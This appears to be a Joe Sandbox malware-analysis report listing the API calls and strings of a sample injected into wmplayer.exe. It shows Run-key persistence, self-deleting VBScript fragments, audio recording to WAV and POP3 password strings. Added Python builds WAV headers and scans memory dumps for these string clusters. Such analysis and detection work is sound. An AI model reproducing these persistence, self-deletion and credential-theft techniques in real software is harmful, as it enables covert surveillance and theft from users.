  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
• PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
• GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
• lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
  • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
  • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
  • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
• Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
• OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
• String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
• API String ID: 4250697656-2665858469
APIs
  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
• SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
• ExitProcess.KERNEL32 ref: 0040C63E
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
• API String ID: 1861856835-3168347843
                                                                                            APIs
                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                            • ExitProcess.KERNEL32 ref: 0040C287
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                            • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                            • API String ID: 3797177996-1998216422
                                                                                            • Opcode ID: 54639b7d9ee10e7a81b53f3e46565cc10b582b28373b0b397b468ca4c2ae59ea
                                                                                            • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                            • Opcode Fuzzy Hash: 54639b7d9ee10e7a81b53f3e46565cc10b582b28373b0b397b468ca4c2ae59ea
                                                                                            • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                            APIs
                                                                                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                            • SetEvent.KERNEL32 ref: 0041A38A
                                                                                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                            • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                            • API String ID: 738084811-1408154895
                                                                                            • Opcode ID: 8f16ee43b4cb6b1ec4ac042b243efdd7e82b32275b6d04eeba487ce5541c5dfc
                                                                                            • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                            • Opcode Fuzzy Hash: 8f16ee43b4cb6b1ec4ac042b243efdd7e82b32275b6d04eeba487ce5541c5dfc
                                                                                            • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                            • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                            • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                            • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$Write$Create
                                                                                            • String ID: RIFF$WAVE$data$fmt
                                                                                            • API String ID: 1602526932-4212202414
                                                                                            • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                            • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                            • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                            • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
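The thirteen WriteFile calls above emit, field by field, the canonical 44-byte PCM WAV header (RIFF, size, WAVE, "fmt ", fmt size, format tag, channels, sample rate, byte rate, block align, bits per sample, "data", size). The argument addresses 00471B02, 00471B04 and 00471B0E sit at offsets +2, +4 and +0xE of a structure at 00471B00, which is consistent with a WAVEFORMATEX (nChannels, nSamplesPerSec, wBitsPerSample); that is an inference from the offsets, not something the report states. The Python below is an added example, not code from the sample or from this report: it builds the same header and checks a recovered capture file against it. The channel count, sample rate and bit depth are assumed values for illustration; byte rate and block align are derived from them, not read from the dump.

```python
import struct

WAVE_FORMAT_PCM = 1  # wFormatTag for uncompressed PCM

def build_wav_header(channels, sample_rate, bits_per_sample, data_len):
    """Return the canonical 44-byte PCM WAV header for data_len bytes of samples,
    written in the same field order as the WriteFile sequence above."""
    block_align = channels * bits_per_sample // 8      # nBlockAlign
    byte_rate = sample_rate * block_align              # nAvgBytesPerSec
    fmt_chunk = struct.pack("<HHIIHH", WAVE_FORMAT_PCM, channels, sample_rate,
                            byte_rate, block_align, bits_per_sample)
    riff_size = 4 + (8 + len(fmt_chunk)) + (8 + data_len)  # everything after "RIFF"+size
    return (b"RIFF" + struct.pack("<I", riff_size) + b"WAVE"
            + b"fmt " + struct.pack("<I", len(fmt_chunk)) + fmt_chunk
            + b"data" + struct.pack("<I", data_len))

def parse_wav_header(buf):
    """Parse a canonical header (16-byte fmt chunk, data chunk at offset 36) into a dict."""
    if len(buf) < 44:
        raise ValueError("buffer shorter than a canonical WAV header")
    riff, riff_size, wave, fmt_id, fmt_size = struct.unpack_from("<4sI4s4sI", buf, 0)
    if riff != b"RIFF" or wave != b"WAVE" or fmt_id != b"fmt " or fmt_size != 16:
        raise ValueError("not a canonical RIFF/WAVE header with a 16-byte fmt chunk")
    tag, channels, rate, byte_rate, block_align, bits = struct.unpack_from("<HHIIHH", buf, 20)
    data_id, data_size = struct.unpack_from("<4sI", buf, 36)
    if data_id != b"data":
        raise ValueError("data chunk is not at offset 36")
    return {"riff_size": riff_size, "format_tag": tag, "channels": channels,
            "sample_rate": rate, "byte_rate": byte_rate, "block_align": block_align,
            "bits_per_sample": bits, "data_size": data_size}

def header_problems(info, file_len):
    """List inconsistencies between a parsed header and the actual file length.
    Sizes that disagree with the file usually mean the writer never patched them,
    for example because the capturing process was killed mid-recording."""
    problems = []
    if info["format_tag"] != WAVE_FORMAT_PCM:
        problems.append("format tag is not PCM")
    align = info["channels"] * info["bits_per_sample"] // 8
    if info["block_align"] != align:
        problems.append("block_align != channels * bits_per_sample / 8")
    if info["byte_rate"] != info["sample_rate"] * align:
        problems.append("byte_rate != sample_rate * block_align")
    if info["riff_size"] != file_len - 8:
        problems.append("riff_size does not match file length")
    if info["data_size"] != file_len - 44:
        problems.append("data_size does not match file length")
    return problems

def check_wav_file(path):
    """Parse a recovered capture from disk and return (info, problems)."""
    with open(path, "rb") as f:
        buf = f.read()
    info = parse_wav_header(buf)
    return info, header_problems(info, len(buf))
```

Point check_wav_file at a file carved from disk or from the process memory dump; a header that parses cleanly but reports size mismatches is still worth keeping, since the PCM samples after offset 44 play back regardless of the stale size fields.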
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Program Files (x86)\Windows Media Player\wmplayer.exe,00000001,004068B2,C:\Program Files (x86)\Windows Media Player\wmplayer.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: C:\Program Files (x86)\Windows Media Player\wmplayer.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                            • API String ID: 1646373207-2501814721
                                                                                            • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                            • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                            • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                            • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
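Two string clusters on this page are worth searching for in other dumps: the self-deleting VBScript fragments and the two Run keys (including the less common Policies\Explorer\Run path) from the function whose calls run from 0040C013 to the ExitProcess at 0040C287, and the ntdll export names the function at 004064F4-00406561 resolves through GetModuleHandleW/GetProcAddress (RtlAcquirePebLock, RtlReleasePebLock and LdrEnumerateLoadedModules together). The Python below is an added example, not from the report or the sample: a scanner that looks for each fragment in both ANSI and UTF-16LE and reports a signature when enough of its fragments co-occur in one buffer. The thresholds, the signature names and the constructed test buffer are assumptions for illustration; the report does not say in which encoding the sample stores these strings.

```python
# Fragment clusters taken from the string lists above; each signature fires when at
# least `threshold` of its fragments occur in one buffer (thresholds are assumptions).
SIGNATURES = {
    "remcos_vbs_self_delete": ([
        "On Error Resume Next",
        'Set fso = CreateObject("Scripting.FileSystemObject")',
        'while fso.FileExists("',
        "wend",
        'fso.DeleteFile "',
        'fso.DeleteFolder "',
        "fso.DeleteFile(Wscript.ScriptFullName)",
    ], 5),
    "remcos_run_key_persistence": ([
        "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\",
        "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",
    ], 2),
    "remcos_ntdll_peb_resolver": ([
        "ntdll.dll", "RtlInitUnicodeString", "NtAllocateVirtualMemory",
        "NtFreeVirtualMemory", "RtlAcquirePebLock", "RtlReleasePebLock",
        "LdrEnumerateLoadedModules",
    ], 7),
}

def _encoded_forms(fragment):
    # Look for each fragment both as ANSI and as UTF-16LE: the listing mixes A and W APIs.
    return (fragment.encode("ascii"), fragment.encode("utf-16-le"))

def matched_fragments(buf, fragments):
    """Return the fragments of one signature present in buf, in signature order."""
    return [f for f in fragments if any(form in buf for form in _encoded_forms(f))]

def scan(buf):
    """Return {signature_name: matched_fragments} for every signature at or above threshold."""
    hits = {}
    for name, (fragments, threshold) in SIGNATURES.items():
        found = matched_fragments(buf, fragments)
        if len(found) >= threshold:
            hits[name] = found
    return hits

def scan_file(path):
    """Scan a memory dump (for example one of the .sdmp files above) read whole into memory."""
    with open(path, "rb") as f:
        return scan(f.read())

# Constructed test buffer (not taken from the sample): self-delete fragments as ANSI plus
# the two Run keys as UTF-16LE, separated by padding bytes.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"On Error Resume Next\r\n"
    + b'Set fso = CreateObject("Scripting.FileSystemObject")\r\n'
    + b'while fso.FileExists("' + b"\x00" * 8 + b"wend\r\n"
    + b"fso.DeleteFile(Wscript.ScriptFullName)\r\n"
    + "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\".encode("utf-16-le")
    + "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\".encode("utf-16-le")
    + b"\x00" * 16
)
```

The ntdll cluster is deliberately set to require all seven names: any one of them appears in plenty of benign code, and it is the combination of PEB lock, loader enumeration and virtual-memory calls resolved by name at runtime that the listing above shows.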
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 0040BC75
                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                            • CopyFileW.KERNEL32(C:\Program Files (x86)\Windows Media Player\wmplayer.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                            • _wcslen.LIBCMT ref: 0040BD54
                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                            • CopyFileW.KERNEL32(C:\Program Files (x86)\Windows Media Player\wmplayer.exe,00000000,00000000), ref: 0040BDF2
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                            • _wcslen.LIBCMT ref: 0040BE34
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                            • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                            • String ID: 6$C:\Program Files (x86)\Windows Media Player\wmplayer.exe$del$open$BG$BG
                                                                                            • API String ID: 1579085052-325541018
                                                                                            • Opcode ID: dc10b710cf19d5e546024f9218f411ba7f3a987ff1f587e32df4140d18237521
                                                                                            • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                            • Opcode Fuzzy Hash: dc10b710cf19d5e546024f9218f411ba7f3a987ff1f587e32df4140d18237521
                                                                                            • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                            APIs
                                                                                              • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                              • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                              • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                            • _strlen.LIBCMT ref: 10001855
                                                                                            • _strlen.LIBCMT ref: 10001869
                                                                                            • _strlen.LIBCMT ref: 1000188B
                                                                                            • _strlen.LIBCMT ref: 100018AE
                                                                                            • _strlen.LIBCMT ref: 100018C8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen$File$CopyCreateDelete
                                                                                            • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                            • API String ID: 3296212668-3023110444
                                                                                            • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                            • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                            • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                            • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                            • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                            • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                            • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                            • _wcslen.LIBCMT ref: 0041B2DB
                                                                                            • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                            • GetLastError.KERNEL32 ref: 0041B313
                                                                                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                            • GetLastError.KERNEL32 ref: 0041B370
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                            • String ID: ?
                                                                                            • API String ID: 3941738427-1684325040
                                                                                            • Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                            • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                            • Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                            • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: %m$~$Gon~$~F@7$~dra
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$EnvironmentVariable$_wcschr
